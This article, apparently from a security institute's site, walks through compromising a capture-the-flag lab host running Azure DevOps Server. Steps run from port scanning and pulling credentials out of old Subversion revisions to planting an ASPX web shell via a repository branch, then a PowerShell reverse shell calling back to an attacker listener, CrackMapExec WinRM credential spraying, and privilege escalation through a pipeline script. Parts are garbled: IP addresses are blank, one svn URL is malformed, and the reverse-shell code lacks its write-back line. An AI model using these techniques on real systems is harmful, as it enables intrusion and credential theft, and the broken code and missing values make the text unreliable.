Azure DevOps Serve is a comprehensive solution developed by Microsoft for versioning, report collection, and tracking for collaboration on software development projects.

The product is available as a standalone application, similar in functionality to the Azure DevOps Services cloud service (until 2019 it was called Visual Studio Team Services, VSTS).

This time, web application security specialists at the International Cyber Security Institute (IICS) will show you how to take over a host with Azure DevOps. It should be clarified that this material was prepared for entirely didactic purposes, so IICS is not responsible for any misuse that may be given to the information contained herein.


In this demo, the machine has an IP address of, which was added to /etc/hosts.	worker.htb

First, web security experts point out that we need to scan open ports. Do this using the following script, which takes as an argument the address of the host being scanned:

ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1 

The web server and SVN service are available to us. Still, the web still has nothing to offer us, web security experts mentioned.

Let’s move on to the SNV service. Subversion is a centralized and free version control system. Let’s get some basic information.

svn info svn://worker.htb 

We already know the baseline, the author, and we can find out the last five changes.


Let’s look at the list of files in this branch.

svn list svn://worker.htb

We have a directory and a file; we will download everything on our host.

svn export svn: //worker.htb/dimension.worker.htb/
svn export svn://worker.htb/moved.txt

And from the last file we find the new subdomain, the web security experts point out.

Let’s add it to /etc/hosts.      devops.worker.htb

But there we find HTTP authentication. Let’s look at the latest changes. In the second step, we found an interesting file that we hadn’t seen before.

svn checkout -r 1 svn://worker.htb
svn checkout -r 2 svn://worker.htb

Next we will apply the changes to get this file.

svn up -r 2 deploy.ps1

And in this PowerShell script, we’ll find the credentials, the web security experts point out.

With the credentials found, you can authenticate without complications.


Let’s pay attention to the repository and the fact that it contains the code.

We use the repository name as a subdomain by entering it in /etc/hosts.      spectral.worker.htb

In this way we will enter the website.

This is the RCE vector. Let’s make the change by adding an ASPX shell to the server. Let’s create a new branch, add a file, add a task, and make the branch the primary.

And after applying all the changes, let’s move on to our file.

We have to get a complete shell. For this, web application security experts recommend starting the listener and running the PowerShell back-up connection.

$client = New-Object System.Net.Sockets.TCPClient('',4321);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
}; $client.Close()

This way we’ll get the shell.

After taking a look around, we found the configuration directories.

You’ll find multiple username and password sets in the passwd file.

And by open ports, we determine that the WinRM service is running, web security experts mention.

Below we can draw up lists of users and passwords with the information found.

cat logpass.txt | tr -d ' ' | cut -f 1 -d '=' > user.txt
cat logpass.txt | tr -d ' ' | cut -f 2 -d '=' > pass.txt

Now you can search for credentials using a brute force attack with the CrackMapExec tool.

cme winrm -u user.txt -p pass.txt --no-bruteforce --continue-on-success worker.htb

As a result, we find the system user’s credentials.


With the same credentials, we return to our site.

This time we can create our own project and execute arbitrary commands through the console, mentioned by web security specialists.

In this file, we delete the group and in steps -> script we write what the system should run. For example, we sort the loading and execution of the previous shell.

In the listener window we see a new connection, but now a shell with high privileges.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.